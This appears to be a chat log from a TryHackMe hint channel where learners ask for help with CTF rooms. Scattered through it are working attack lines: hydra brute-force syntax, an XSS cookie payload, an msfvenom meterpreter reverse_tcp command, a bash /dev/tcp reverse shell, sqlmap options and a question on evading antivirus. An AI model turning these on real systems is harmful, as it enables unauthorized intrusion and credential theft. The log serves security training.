#room-hints

and im trying to get the shell

but i get that system cannot execute a blank command, when i want to write something

of course, with a blank space

already tried with %20

i get it

Hi guys, doing the advent of cyber christmas challenges, the one where you have to brute force using hydra

I've tried everything, can you confirm that the machine works as intended? thank you

@next glen Web no

SSH yes

Web is broken?

https://tryhackme.com/room/hydra This is the same VM but with fixed web

Same flags too

Give it a go

got it, thank you James

hey @stuck fractal , ssh might be broken too; just tried all the possible passwords

It works for me

idk, I think it's probably this machine?

I wasn't able to solve the rdp challenge the other day until it got fixed

the one where you have to run the cert exploit

can i get a nudge on c4ptur3-th3-fl4g
task 5, security through obscurity? struggling to find the file within the file. tried viewing metadata

@next glen What's the IP?

10.10.11.240

I'll give it a go and get back to you

thank you, appreciate it

also tried a different list other than rockyou, I still get lots of output

On the web one?

Normally means you're not doing it right

no on the ssh one

I get 16 valid passwords for the web one

wouldn't wanna spoil anything, if I have, we can pm

Did you kill the VM?

Gonna take that as a yes seeing as it's not up

Yes I did

Can't check that easily then

can't you deploy it yourself?

I can, but then it takes time to boot

something is wrong for sure

on this vm that I deployed, it's outputting way too many passwords

and I am certain that i'm using hydra correctly

SSH works.

can I pm you for a second?

And web still works.

I'll let you this time

let me what

DM me

oh haha, it's not like I'm gonna make it my habit

anyways

hi all, im trying to figure out what the answer to question #21 is in the BP: Splunk room. - Have been researching and the only option that is logical is "rename".. Any help?

rename is not the correct answer obviously 🙂

Anyone can help with The Impossible Challenge? I manage to decrypt the question but I still have no idea...

hey i need a little help

my kali machine says msfvenom command not found

I'm not sure what to put here. Can anyone help me? I thought it was root and Tryh4ckm3 ? It's probably a dumb question, but yea

@white salmon terminate and redeploy

Bug is being fixed very soon

I tried it twice. It loads the machine for a minute and in the end asks for credentials. Guess I should have not logged out of the machine in the first place. I'll just use PuTTY until the bug is fixed. Thank you!

Guys i'm doing bpnetworking stuck at "Of these addresses two are reserved, what is the first addresses typically reserved as?" I can think of localhost, loopback and 10.0.0.0, done online research but not found exact answer

@winged drum keep looking. You're on the right track.

if anyone is done with Retro CTF please let me know i can pm? I had some doubts

@spark monolith What are you stuck on?

The exploit present in the recycle bin isn't working @late patio

I'm surprised that room is still running. lol..If you found the exploit there is a video you can watch that show's you how to do it...It works, It just has a bit of an attitude.

i have gone through one of the writeups but i am not able to understand that how they came to know about that cve ? that particular exe gave them direct admin shell

ah. look at the history...

@spark monolith You can dm me if you want.

I have a problem with that too but i thought it should be that

hey anyone has any hint for jigsaw room
the enumeration of the room give me no result i tried every scan tool i know

@glacial ember There's a reason it's rated as insane, but here's a hint ||wireshark||

it didn't work

Please remove the spoiler or put it in spoiler tags and simply

And I advise against looking at writeups without solving the box first, it ruins the fun. 🙂

yeah but when you stuck and you don't know what are looking for exactly ...

@tidal sedge and there is a same room on vulnhub

It was imported from VulnHub

The author is a mod on this server.

Just re-did alfred but without using metasploit, fun

For the scripting challenge, Task 2, I'm assuming there's a defined start port? The question is not entirely clear on that matter

@ripe hedge You start with port 1337.

Ok, so there is a dedicated start port ok

the starting point given is 3010

and it wasn't clear that the sequence was fixed

I don't remember this challenge well, but I have no idea why it says that 🤷

Let me check the writeups real quick

magic?

loool jigsaw

the writeups assume 1337

good luck spotting the initial vector

but I'm trying to robustify the flimsy python

Yeah, Jigsaw was fun

yeah, the room itself is darn hard

Hi can someone please give me a very small hint regarding the bonus challenge in the learn linux room?

when do you recommend using find / -xdev vs just find / ??

oh. dividing by 0 is a bad idea...

I think I overkilled the task though

How long does cracking the password for task 2 in basicsteganographyal take, just curious, I've been through ||8.17%|| of rockyou and still no password
Room link: https://tryhackme.com/room/basicsteganographyal

takes a lot

IIRC it was ~13%

I have left it running in THM kali at that time

@glossy basin Alright, thanks 🙂

hmm...the Hard problem in the Scripting room feels easier than the Medium problem...

Hello, can some1 give me a hand in room https://tryhackme.com/room/theimpossiblechallenge
Dont really know how to start :/

i've heard decrypting the hint is a good place to start, but i haven't really looked at it myself

aww thought so, but im not coming with anything with this letters mess xD

You can do that bit in Cyberchef

@inland onyx don't know if I would recommend Cyberchef to new 'learners'... it's a great tool but skips a few basic lessons that are valuable 🙂

Wonder if cyberchef has a docker image

don't think they originally have but maybe this helps @ripe hedge https://hub.docker.com/r/remnux/cyberchef/

Yeah ok there are several

@ripe hedge It's a static HTML/CSS/JS page

You can just open the file, or get a webserver for docker

Looked like node from the source

doesn't matter.. install node.. run it with node.. and you'll have it locally

but I would prefer a docker image tbf 🙂

Ok it webpacks it

So yeah it can probably live in an nginx

Oh haven't seen grunt in a while though

hmm grunt.... * grunts *

Firefox doesn't like serving JS from file:// anymore

try chrome?... maybe safari? chromium? brave? internet explorer?

lol

Yeah not ie :p

😉

Not a fan of Chrome's devtools

The network stuff is a bit wonky compares to firefox

FF also has better CSS tools imo

depends what you're used to... I use brave (which is just kinda a chrome clone) always for the network devtools

To each their tools

but yeah.. isn't there a setting in FF to turn that off? maybe look for that on the webs

Probably but it's also good practice to leave the cors bits on

well everything for research right? 😉

:)

but yeah.. else just take the docker.. or build your own dockerfile

It's not hard to spin up an nginx anyways

And compose helps

(that why i'd use a docker.. even faster, no nginx needed)

no extra tools at all.. tbf

Nginx docker image I meant

I like docker compose because I can never remember the cli arguments to run the thing

well.. that's a flaw.. you should fix that 😉 😛

Can always spin up a k8s

Might be overkill though

... dude.. overkill much

Keep it PG13 guys 🙂

Ok, agreed that k8s is a crime against humanity

nah.. it depends where you use it for.. for yourself? yes.. overkill.. for a company that has a lot of services and isn't monilithical.. it's ok to use

I jest of course

“What is Google's top service across all their devices on this ASN?” There is no services listed on Ultratools ANS listings for Google

@white salmon You're doing the shodan room

Use shodan

That seems obvious

Maybe it can’t be done on mobile

@white salmon Use shodan.

I know thank you, I just can’t seem to get to the right path on mobil, i’ll finish when I get to my desktop

@glossy basin I finally managed to find the password after 4-5 hours of cracking 🙂

nice!!

@tidal sedge For the steg room?

I think it needs to be made private

https://tryhackme.com/room/basicsteganographyal -- this one, the second task is not fun at all

maybe add a hint with the first letter of the password

The bruteforce in this reminded me of HTB's Smasher 2 😨 , through I think they removed the bruteforce part later

hello, o just end the basic linux room, and i want to you guys tell to me what rooms do, im very confused and i dont know with what start, kali linux? blue?,,, someone else?

@white salmon I recommend following this guide: https://blog.tryhackme.com/going-from-zero-to-hero/

thx

So I'm doing the post exploitation basic I'm following along the steps so once I get to using the power view.ps1 and run it. I get errors. Like it doesn't want run and I'm doing exactly as the guide is telling me to do. I even did the powershell -ep bypass. What am I doing wrong. I've used powershell scripts before and I can't figure out

Can you post the log?

Yeah give me a sec

also, go to #room-help

hey james, can you give a hint for this question on wifihacking101? @stuck fractal

@viral mason It's a part of the aircrack suite

Read some guides on how to use the tools packaged in there

look at the documentation its not hidden

ok thx

https://www.aircrack-ng.org/doku.php?id=airmon-ng

thanks man

Added it as a hint on the question

yup, completed the room, it was a nice ride thanks @stuck fractal

Now give it a go yourself

sure i will

Have logged into Shodan and searched for “What is Google’s top service across all their devices on this ASN?” There doesn’t seem to be any three letter acronym or word answer

try SSH

I haven’t learned SSH but i’ll see what I can do with the IP if that’s how it works

basically, its asking what service i.e. protocol (http, https, dns, ftp, ssh, telnet, etc) is the most common acrossed the specific Autonomous System iirc

I tried those when they appeared on Shodan, tcp, udp, dns but i’ll try the others, I guess it just wasn’t obvious enough for me 🙈

Thanks, thought it was looking for something like GCP - Google Cloud Platform as their “Service”

I wish it said protocol instead of service, that would have saved a lot of time lol

@white salmon HTTP, DNS, FTP etc are services.

two out of the three have protocol in their name

hypertext transfer protocol, file transfer protocol, domain name service

Spooks

You know exactly what the distinction is

I do, but theyre protocols

https://www2.southeastern.edu/Academics/Faculty/nadams/etec650/Protocols.html

service

that whole page has protocols written all over it

And also service

word statistics

protocol occurs 45 times

That's because the page is about protocols

service occurs 14

I just never learned them with the term “Service” involved, i’m studying the A+ so I have only known them briefly as protocols, the port numbers for them and what they do

nmap -sV

how do i start entering text into a new vim document ? anyone

has anyone completed the HA Joker CTF?

man vim devprogramming

@white salmon The images often don't show up properly

Reexploit.

@stuck fractal Images are loading

But idk how to upload the rev shell

Morning, wondering if someone could offer a hint to task 5 Q1 of the xss playground. I get how to make an alert on the mouseover. im just not sure what it wants me to do with cookies?

I tried test" onmouseover="alert(Document.cookies)"

It just returned undefined

Nevermind, as i was rereading my post on here i noticed i had a caps on Documents. That seemed to fix it

Hello, is anyone facing issues in the task 7 11th question of the room "Network Services" created by PoloMints.
I am not able to get the reverse shell

anyone completed the Bookface room?

I can't the password as is not in the fasttrack dictionary

can anyone give me a hint on the dictionary to use?

it seems that on port 22 is refusing the connection

can somone give me a hand on steel mountain? ive made a service exe, overwritten the existing one (using windows/shell/reverse_tcp) the service doesn't do the 1053 error, and hangs in start_pending, but doesnt throw me a shell back?

im listening on 8080

any hints on how to see func addresse in task 7 in Buffer overflows ?

tried via r2

but my r2 skills failed 😦

Do the radare room?

bookface has always had that problem iirc

i think Ninja/james found it in rockyou at some point

the password is in fasttrack but for some reason it doesnt work if i remember correctly

@wraith marsh did that but I don’t see how I get the func address still

user r2 to print the list of functions, it has the address next to it

yes and that is my question howto do 🙂

If you had done the Radare2 room you would know

its in there

Ima have to say TryHarder on that

okay i will go back an revisist

okay got it what is know the bast way to calculate the payload or rather how to overflow to a specififc adress ?

with a cyclical pattern generator

Also

Remember running a binary inside a debugger will use different offsets

Yes i just a Way or a pointer On how to proceed

What room?

hes doing bof1

task 7

Probably chuck it in a debugger and see what you can do

If you're overflowing a buffer where the binary is doing a strcpy or similar, you can get the address of the start of the buffer using ltrace

Task 7 is overwriting a function pointer IIRC

Yes

Hey all, I'm having issues with 2 questions in the Splunk room and could use a nudge.

Specifically Task 2, questions 21 and 23. I know the answer for 21, but it refuses to accept it.

Hey all, I'm having issues answering question 6 on task 2 for the lord of root challenge

can anyone help me please

?

nevermind added 2 spaces and not one

Hey, can anyone give me help on ctf 100 room . I'm stuck on stage 5 task 12th , after Flag 71.

Am I just a dummy, or is django supposed to be giving me such a hard time with starting an app?
I am dumb. I got it.

How do I add tags

Verify with the bot

It should have sent you a message

Also, try asking in #general 🙂

Thanks

Why it not working for me? Any hint?

@white salmon wrong username

i found only john and james

i tried johncactus and many others

You're assuming the username is a first name

You haven't tried the right one

so this is no john or james from this message inside?

You've assumed the format of the username

firstname or firstlast

Try other formats

ok thank you @stuck fractal i got it 🙂

in room ccradare2 any hint ont the final questions ?

for the life of me I can't tell the different between the 2 different login with the phishinghidden I room what am I missing

I'm trying to brute force a simple login.asp page. I've successfully used hydra in the past where the previous exercises were http-post and I was able to see a failure message that I could feed to hyrda. In this case it's an http-get type login and there isn't a failure message that renders in the browser on a failed login attempt. The only reason I can tell it failed is because of the 302 response code. I think hydra requires either a success or failure string as the third http-<method> arg so I was wondering if there's any way to specify the http response code instead. Anyone else run into this?
hydra -l admin -P <password_list> <ip> http-post-form "/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:Login failed" -V
^^thats the syntax I'm used to for POST forms where there's a failed login message of "Login failed"
just wondering if there's any workaround if there's no success or failure message

You can try to use something on the login page, assuming it redirects there

i been working on this for a long time and i just gotta ask for help now ... even with all the walk throughs i follow step by step perfectly i cant get my shell uploaded im getting this error on DogCat when trying to send the shell.php from burp this is the error i see in the log file_get_contents(http://10.8.10.142/shell.php): failed to open stream: Connection refused in <b>/var/log/apache2/access.log

in basic pentesting when i use hydra to find the pass i try with ssh port and will take 2 hours to find with a normal wordlists

@dusky zephyr No

It predicts 2 hours

It could be sooner

Much much sooner

have you considered trying it out first? @dusky zephyr

hm i am trying now i use john wordlist threads 4

Hydra and John have very different purposes

If you don't know the difference or what each does, you should really find out.

any other wordlist which i could use.

rockyou

@solemn smelt thanks

am I missing something with the SQLi labs

there's not a lot of info

am I supposed to be proficient with SQL injections before doing the SQLi labs room

Hi there, I dont find the zip file mentioned in Agent Sudo task 3 #2 , who could give a hint?

@white salmon yes, SQLi labs is not teaching anything

but a SQLi teaching room is coming soon

ok cool

do you happen to know of a good beginner resource

I got stuck on the OWASP juice shop and went looking for SQLi lessons

Got stuck at django ctf hidden flag. Any hints please?

im on task 5 of the OWASP juice shop, trying to find more info on Jim so I can reset his pw

I've tried escaping the product search query like q=juice' order by 1-- and I tried similar in the product comments

Hi guys iam bussy with introresearch question
#5
If a password hash starts with $6$, what format is it (Unix variant)?

I know it its sha-512

But what do they mean with format ? i think that iam searching way to deep in sha-512

Because iam currently looking in how the algorithm is build..

@white salmon "He's dead, Jim"

Figure out which famous Jim he is, the rest is osint

@thorn finch assuming you're trying to crack it with hashcat, check the help

||king@ubuntu:~$ ps aux | grep openvpn
king 886 0.0 0.2 14224 1020 pts/0 S+ 06:04 0:00 grep --color=auto openvpn
this is sopposed to be running a root cron job and its not so i cant get root.... its on LaxCTF||

Process owner is the user, so...

nvm i got it now

Hello all. Do you know how to enumerate telnet users?

I cant find it in google.

Hi, does anyone complete RP : Nessus on Window platform ?
https://tryhackme.com/room/rpnessus
I got an issue on [Task 4] scanning result
This is my final Nessus scanning result, which is a lot different from the actual scanning result. Someone said that I am not performing full scan. Does anyone know how to perform it ? I have done all the settings given in the room btw

do you have a set up all the ports and scripts?

The basic scan result that I have got finally

@white salmon what do you mean the setup the scripts ?

sorry "plugins"

it is not a nmap 🙂

@white salmon those it counted as set ?

I have enable the scan type to all the ports btw

looks ok

I am stuck at Anthem's reverse shell wherein I am trying to download the nishang PS reverse TCP and its getting detected by antivirus...any hint to bypass it?

I'm doing the Ignite Room but not getting reverse shell. I tried two different writeup but still not getting. Any idea why it's happening?

Is this some kind of command injection?

can someone help me with the final exam question on the cc: radare2 room?

here's a link for it https://tryhackme.com/room/ccradare2

all the other questions and examples were easy

but im lost on the final one

Hi guys, I am trying to read a file on the FTP section of network services

! dir mdelete qc site
$ disconnect mdir sendport size
account exit mget put status
append form mkdir pwd struct
ascii get mls quit system
bell glob mode quote sunique
binary hash modtime recv tenex
bye help mput reget tick
case idle newer rstatus trace
cd image nmap rhelp type
cdup ipany nlist rename user
chmod ipv4 ntrans reset umask
close ipv6 open restart verbose
cr lcd prompt rmdir ?
delete ls passive runique
debug macdef proxy send

I have to choose from these commands, any ideas?

download with get

thanks. I think the machine dropped, which is why it won't work 😅

that'll usually be a good cause

in Windows PrivEsc Arena task 1, im trying to avoid metasploit so Im listening for the reverse shell with nc. it has shown that it is connected but no output. I used the command msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.64.30 lport=4444 -f exe -o program.exe R and fetched it from a webserver...can anyone provide a hint please

@noble tinsel You have a meterpreter payload.

yeah i just realized

That's the opposite of avoiding metasploit

thank you

Hey all, I am experimenting with DVWA brute force on the high security. I have a python script using the requests & bs4. My big issue is after I grab the "user_token" and then pass it in as a portion of the data, the html that gets returned shows no difference between a correct authentication combo and an incorrect one. Any ideas on why this is?

Code Here -- https://pastebin.com/n5BXfRXC

can someone help me with the final exam question on the cc: radare2 room?
@little tapir still stuck?

so.. on the Basic Pentest box, is ||K's ssh key|| actually used?

couldn't get the password to work

@ripe hedge it was for me

ok... I abused an suid root program to read the files...

ah I see.. did not know how to crack the key password

thank you google

anyone got a hint for the final question for linux walk through?

i've discovered nootnoot has sudo privileges, and went to their home dir but couldnt see anything more

@white salmon Maybe look for files belonging to all users, you might be able to gain access to nootnoot

i noticed the .sudo_if_admin_successful thing

that's a lot of files :|

shall look

is it something that should stick out, like really out of place - or is it more covert than that

Fairly overt

ok, shall look

note to self: dont do this at 3am

brain no work

im stuck - i found my way into ||/run/ where there's some interesting files like "sudo" (apparently an executable directory???)|| but im stuck from here

@white salmon ||belonging to shiba2||

hmm

is it anything to do with ||the tmp dir? i see tmux-1001||

im also guessing i can ||ignore /proc and /sys?||

Yes you can ignore that

is there a way i can remove ||proc and sys|| from my results? they're bloody annoying

Instead of find /, you could find in each directory

could you elaborate on that?

not sure what you mean

i did ||find / -user shiba2|| to get everything by them

and then i piped it to an output file, winscp'd it to my desktop and removed all mentions of ||/proc and /sys||

so find /etc

find /home

hmm ight

@stuck fractal i cracked it

i cannot believe it took me THAT long to see something THAT obvious

i cry

thanks

It takes everyone a while

The more you know, the longer it takes

Which image shows a legit web-page? Anyone

Stuck in Extreme Obf challenge in JVM Reverse Engineering room.
I extracted the required code from the decompiler and use them to create a same java file that would print out all the strings. But all the strings come out with Japanese characters in b/w them

https://tryhackme.com/room/theimpossiblechallenge# I need some hint on this.. Task1

||Spoiler Test||

did u decode the hint? @indigo ridge

can i ask for help here?

i think i did everything right but not sure

@heavy stump This chat is for hints not help

I sort of need a hint/clarification on what a task is asking of me.
I'm doing the Linux Challenges room and this is on Task 4, question 7.
Im unsure on if it's asking me to to basically list all files on the machine to find a file that starts with the name of "4bceb", or if it's asking me to find a file that has the string that begings with "4bceb"

the latter

though you can try both 🙂

@drowsy blaze The flag starts with those chars. Find the flag

cool thanks!

Any hints on Radare2 room the final exam ?

@mild eagle I am about to start that task, I will let you know if I can figure it out

About when Lola started her photography, I'm not so sure it isn't glitchy. Without giving too much away , I did read the blog page and can see where she literally mentions that it's been "X" date since she started, yet entering that date is regarded as a wrong answer. Since it's just that obvious, I'm not so sure it isn't glitched. Just saying -- on the other hand - I LOVE this exercise as it's about getting info on the user - it's surpring how much info people leave on online!

@remote leaf You need to do some maths

The ||page you're looking at is a snapshot in time||

I'm aware I have to do math. She's literally saying she started Y years from X date which is shown on the webpage, it's basic math. 🙂

@remote leaf Read the question carefully, you're told how to format the date

Sorry about rule 1 earlier.. I didn't read it before. I did now. I understand what you're telling me. Sneaky, boss!

@remote leaf Not sneaky, THM is a british company. Read the damn questions

so for a room i am in, it wants me to nmap, i can do this still if im on a kali vm even if the vm isnt connected to the openvpn?

Connect the VM to the OpenVPN. Don't connect from the host

so i have to get openvpn for my vm, got it

thanks

Kali comes with it installed @white salmon

oh okay

Greetings, I have a basic question which I don't know how to solve, perhaps someone can give me an insight.
I was doing the Basic Pentesting and I needed to use John to crack the RSA Private Key after making it read only.
My issue however is that while using John w/ RockYou.txt, instead of the solution it gives me and output with <?> symbols.

I went to the extend of checking the Writeups and following it, but the reason still persists.
Thank you for your time in case you end up reading it.

I'm working on CTF 100, and I don't know what cipher comes to mind with this string.

The second flag haha

Wait nevermind it's rot13

@white salmon It'd be a lot easier to help if you posted screenshots

Sorry for the quality, couldn't print screen, not using discord on the laptop momentarily.

@white salmon Ok, look at the file you're giving john

.gz

that's compressed

you need to decompress it

Any command in particular to decompress? I'm new to this, but willing to learn.
And thank you for your help.

gunzip

Thank you it worked!

The issue was indeed what you told me.

@stuck fractal I really appreciated your help. Thank you once again!

ctfcollectionvol2 - maybe above my knowledge level, but currently stuck at easter egg4. have tried to throw what little i know at it. tried sqlmap a bunch of times. i think i have approached the blind time based sql with it in a few ways, but nothing came back with.
sqlmap -u 10.10.7.219/index.php? --technique=t --time-sec=3 --forms --crawl=2 --level=3 --risk=3
nothing coming back.
any suggetions to get more info on better use of sqlmap or maybe a tip👍

I'll look at it

@steady rampart I'll see what I can pick at when I get to it. Seems interesting.

hey everybody

has anyone done this room

https://tryhackme.com/room/c4ptur3th3fl4g

if yes could you please help me how you crack this hash

11FE61CE0639AC2A1E815D62D7DEEC53

@plucky steppe in the. Last task before the final exam did you see the msg I could see it was suppose to print out ie. I’ve changed the value, but no output was shown on screen

@tribal ginkgo googling is your only option, using the sites like md5hashing, md5decrypt etc..

@hasty slate I tried there didn't get there anything

yeah lol.. maybe use a writeup.. I didn't find that hash either in any of those sites.

it is not bruteforcable

@hasty slate i saw the writeup there was direct answer given no way to find out how they get it

ermmm maybe need to hashcat/john

did u find the hash type?

@tribal ginkgo

yes i used hash-identifier

its says md5, or ntlm

its not md5

its ntlm

@shrewd verge

yea ntlm.. due to the hints given

yes

tried hashcat with rockyou

didn't get anything

I know the answer due to writeup , but

how do we get there

yea i saw the same writeup... still figuring the same.. how he get the plaintext.. maybe need bruteforce?

if that long you try to brute force in hashcat it gave you interger out of length

going take ages...

what length did you give

i should be bigger than this

well didnot give length but i give the -m 1000 (ntlm) -a 3 (bruteforce)

yeah its using 7 length but as you already know the answer is pretty big

XD room of patient

need help with shodan.io

what kind of help?

@elder bloom

@shrewd verge with task 4 question 1

shodan gives result with answer with different format.

well its either the question ASN you use is not same as the question.. i did found a few ASN for google

which give different answer

i will try with other ASN's

try the one on the example.. n the one from you google

i am using ||AS15169||

what did u get for the answer?

||Windows Server 2008||

that corrrect answer.. did u submitted?

yes

it is saying incorrect

😆 that weird.. i submit n its correct..

now it is accepting

earlier answer format was different now it changed

i dont know what was the problem Xd

anyways thanks👍

because the answer was fixed

(to the right one)

who dos that and how?

the room creator fixed it

basically, the operating system changed since the room was created

so this why it should have been changed

and here i was thinking there is something wrong with me

any hints on dogcat? .. i did found only on the php filter lfi

ahhh i got it

😆 👍 1st flag

Uh, that looks like it is a flag

(On which note, mind editing it out @white salmon?)

I tried using it.

It didn't work.

Which question is it exactly?

Easter 4 on ctfcollectionvol2

Ah, in that case no it is not the answer 🙂

Use the hint

Oh well. Skip the easter eggs for now.

I've tried for quite some time

how can I scan ports for files with nmap?

You don't?

But in the room „Advent of Cyber“ Day 7, last task, I have to do this

No, you don't.@shell sun

You found something running, interact with it.

How?

look up the process thats running on google and how to interact with it @shell sun

Lol, thank you. I didnt know, that you can do this

@mild eagle hey sorry for the late reply I could not figure out the last question on Task10

@plucky steppe just solved it see in community hell my replies to forser he is also struggling

@mild eagle Yeah I am actually reading them now haha

Hello all,
i'm trying to decrypt a file (not related to a room)
Any tool suggestion?

Greetings, I'm doing the Anonymous v6 Room & I am stuck.
I need to create a reverse shell and import it trough ftp.

My questions:
• What IP & Port do I use as my own inside the .bash.sh [The virtual Ip Adress provided by TryHackMe?]
• When I try put directory/bash.sh to import I get disconnected by the ftp connection

I've never created a reverse shell, I appreciate the help.

You should always be using your VPN IP address

The target can't talk to you with any other address

As the reverse shell command I wanted to use: bash -i >& /dev/tcp/<ip>/<port?> 0>&1 but I don't even know how to make it work or upload to the ftp target without getting disconnected. Any hints?

I recommend doing other rooms first and learning how reverse shells work and how FTP works

Thank you, please let me know if you recommend any of the rooms.

Check the pins in #general for a guide on the order to do rooms @white salmon

Regarding Intro to x86-64, I'm having trouble getting the answer to "If Statements Continued #1".. I set a break point immediately before the retq and pop instructions, but the answer is being shown as wrong

Anyone have any hints?

It'd be much appreciated 😄

what did you put for the answer @fiery garden

63

@fiery garden is that the value for var_8?

I know for one of the questions you have to convert it from ||hex to decimal||

I'm setting a break point at 0x5562f623c637 and checking the value 'px @rbp-0x8' - Am I reading the output wrong?

@fiery garden yeah I got a different answer you are close though but its not 63

are you using the binary if2?

Yeah

I've tried a few different answers that didn't work

Like 60

that ||60 value is hex|| @fiery garden

Thanks for your help. So are all of these values typically in hexadecimal?

not always

The other answers didn't need to be converted so I imagine their hexadecimal values were the same as their decimal values

yeah

until you get to 10 which will be a in hex

Alright gotcha. Thanks again! I should have better read the note on the page, "The value stored in memory is stored as hex."

What do I do with crontabs hint i’ve been stuck in it for like 2 hours

I see all users get x permissions but I still can’t use sudo in the correct directory ; /

@white salmon What?

Whatever you're saying, it doesn't make sense

In Linux Ctf my hint for flag 4 is crontabs, I saw the usr/bin/sudo is r-x for my group but sudo doesnt work to get in crontabs for flag

That just means you can run the sudo program

That doesn't mean you can actually run commands using sudo

You need to actually look where crontabs are stored or created

I found crontabs I just don’t know what to do once I find it

I’ve tried cat with sudo ./ and ~/ etc or cd etc

Just says bob is not in sudoers file, this incident will be reported

Have you considered that you're just fumbling and throwing sudo at stuff when you're met with a problem?

Because you really shouldn't just use sudo if something doesn't work

Yes i’m a novice throwing stuff at it that I think might work

Don't throw sudo at problems.

And it hasn’t been working

@white salmon Look at how to view your user's crontab

For bob.

K

Hah man 🙈 then I found the flag thanks

Hello there again i have few issues in intro X86_64 challenge

i dont understantd this question task 4:
What is the value of var_8h before the popq and ret instructions?

what is the issue with that question?

that the value that i am getting is 63

and its saids is wrong

Well that's wrong

so it is

i am following the tutorial in the pased if1 executable

same instruccions to get the value

and etc...

do it again so

are you sure you are looking at the right value? are you sure you are looking at the time just before the pop and ret instructions?

break points are in jge and jmp

Are you using the if2 binary?

yes look at output:

(fcn) main 68
| int main (int argc, char **argv, char **envp);
| ; var int32_t var_ch @ rbp-0xc
| ; var int32_t var_8h @ rbp-0x8
| ; var int32_t var_4h @ rbp-0x4
| ; DATA XREF from entry0 (0x5601fb7ce50d)
| 0x5601fb7ce5fa 55 pushq %rbp
| 0x5601fb7ce5fb 4889e5 movq %rsp, %rbp
| 0x5601fb7ce5fe c745f4000000. movl $0, var_ch
| 0x5601fb7ce605 c745f8630000. movl $0x63, var_8h ; 'c' ; 99
| 0x5601fb7ce60c c745fce80300. movl $0x3e8, var_4h ; 1000
| 0x5601fb7ce613 8b45f4 movl var_ch, %eax
| 0x5601fb7ce616 3b45f8 cmpl var_8h, %eax
| ,=< 0x5601fb7ce619 7d0e jge 0x5601fb7ce629
| | 0x5601fb7ce61b 8b45f8 movl var_8h, %eax
| | 0x5601fb7ce61e 3b45fc cmpl var_4h, %eax
| ,==< 0x5601fb7ce621 7d0d jge 0x5601fb7ce630
| || 0x5601fb7ce623 8365f864 andl $0x64, var_8h
| ,===< 0x5601fb7ce627 eb07 jmp 0x5601fb7ce630
| ||`-> 0x5601fb7ce629 8145f4b00400. addl $0x4b0, var_ch
| || ; CODE XREF from main (0x5601fb7ce627)
| ``--> 0x5601fb7ce630 816dfce70300. subl $0x3e7, var_4h
| 0x5601fb7ce637 b800000000 movl $0, %eax
| 0x5601fb7ce63c 5d popq %rbp
\ 0x5601fb7ce63d c3 retq

I mean you can dump assembly in here all you want

It's not really going to help

You need to analyse the memory when it's running

yes but you are asking if the file that i am running is if2 so my answer is a yes because the var_8h and var_4h are different from the first one

That was a single question

There's more questions

yes the other question was if i am finding the correct value and yes i do i find the other question answers look

try to use "spoiler"

pls

Pls don't post answers @ripe rock

i did that room, i know the value is not 63

You can post screenshots of questions, just either blur or remove answers to others (:

thanks i forgot to use spoiler

so, try to use breakpoints to know which is the value

Even with a spoiler it would of been removed

break points are in jge1 jge2 and jmp

But yes, different breakpoints as Pelado suggested (:

also i try in cmp

try harder (and different)

what do you mean?

use breakpoints in another points

same

@grand pivot Same thing

@grand pivot can i share you screen to see it ?

Try more breakpoints

but try not to randomly guess either

No , i did use breakpoints(jge,jge,cmp,movl after first jge and andl,movl in var_8h first lines)

@steady stratus So you are telling me that i am wrong 6 times?

If you're tried 6 times and been told your answer is wrong 6 times, then yes

hello can anybody give me a hint on zeus ?

It's not a public box, Elf

Mhm yeah, I mean If the answer you suspect it isn’t accepted on the website then...

I haven’t done that room in a long while so I’m not quite sure of the breakpoint @ripe rock. Though I don’t remember it being too hard, but the room isn’t aimed for me in that regard

Keep on trying man (: id run through it but I’m just about to log off gl with it

@steady stratus So you are more of website tan binary?

@stuck fractal nwm i got in lmfao

@white salmon Try harder.

i just did 😛

@ripe rock So, you set the breakpoints. Did you then dump the stack?

for the record. im not looking at writeup ok??

@stuck fractal Yes i check for the values doing dr

@ripe rock So you're just printing the registers?

@steady stratus So you are more of website tan binary?
@ripe rock How'd you mean?

That's not going to get you very far

You're not looking for a register value

You're looking for a variable value, variables are on the stack

You need to dump part of the stack

@steady stratus That you know more of networking,websites but not to much in RE or malware analyst.

Ah gotcha, sorry haha. My degree specialises in malware analysis (: @ripe rock I just haven’t done that room in a long time so I need to look back on it :^)

@steady stratus You are now my hero jajaj that degree is difficult you need a good memory to keep on track variables in assembly, anyways thanks to @stuck fractal he give me the answer by saying "You're not looking for a register value" beacause in my notes i did it without doing px @rbp-whatever 🤣 beacause i want to not look my notes in order to prove that i learn it

Remember the difference between registers and variables.

@stuck fractal Yes i will update my notes now

How do I gunzip without permission on flag12 Linux Ctf room

get permissions

You have 2 or 3 users

Linux Walkthrough: trying to do the final question, the contents of /root/root.txt. I've found the other two users; I've discovered the "simple" user's password and can login, but I can't get into the other user account which is a sudo one. At this point, I'm stumped.

Check users privileges and file owners

Room blue: It says to scan for an exploit and use it, and confirm whether it's working, but I get

[-] 10.10.210.255:445 - Errno::ECONNRESET: Connection reset by peer
[*] Exploit completed, but no session was created.

Edit: Solved!

glad you got it

dogcat room, is there any hints on flag 2?=/

@shrewd verge i haven't done that room .-.

@real storm how is Blue going for you?

been fuzzing for 2days.. still looking for more tutorials

@shrewd verge you've had a program running for 2 days??? there are problems like that??

I had a phonecall so I took a break. I think I was almost done with it

It's a walkthrough so I shouldn't be stuck at this at the very least

ok ^_^

well i have no idea how to lfi for other flag.. only get the first one @visual tapir

Linux Walkthrough: trying to discover contents of /root/root.txt. I binary-edited the /opt/rescue/shiba4 to change the cat'ed file to /root/root.txt, on the basis it is a suid binary and should be able to access root's directory. No, permission denied.

I'm confused. Did you get stuck or...?

@sharp crystal instead, try to find files which belong to each user (using find command) and see if you find anything useful

@glossy basin Got it! thank you.

BTW, 'vim -b' doesn't honour the setuid flag when saving the file (why the first approach didn't work). Not sure if that's a bug or a feature. 🙂

In xss room keylogger Part am i doing something wrong every time I try to past a keylogger script the server stops also tried with the example keylogger

@sharp crystal if you edit a suid binary, it loses the suid bit. Doesn't matter how.

Hello everyone

Im with goldeneye

in pop3 BF should i use rockyou or another wordlist?

|| in the lord of the root room i have tried port knocking ports 1,2,3 but that doesnt open up any ports as it should, can someone help me out with the syntax of port knocking?||

it is already finished

Can anyone suggest a dictionary for BookFace, because the fasttrack dictionary does not work.

?

@echo thunder Rockyou

ok thanks

i use vim all the time, and im confused about what the vim room task 2 question 2 is asking me

like.. you just press " i " to insert and start typing lol

@visual tapir Once you're in insert mode

You answered it right there

Think less hard.

the answer format is 6 chars, and its not "insert" or "INSERT"

wow.. nvm

a "LOT" less hard

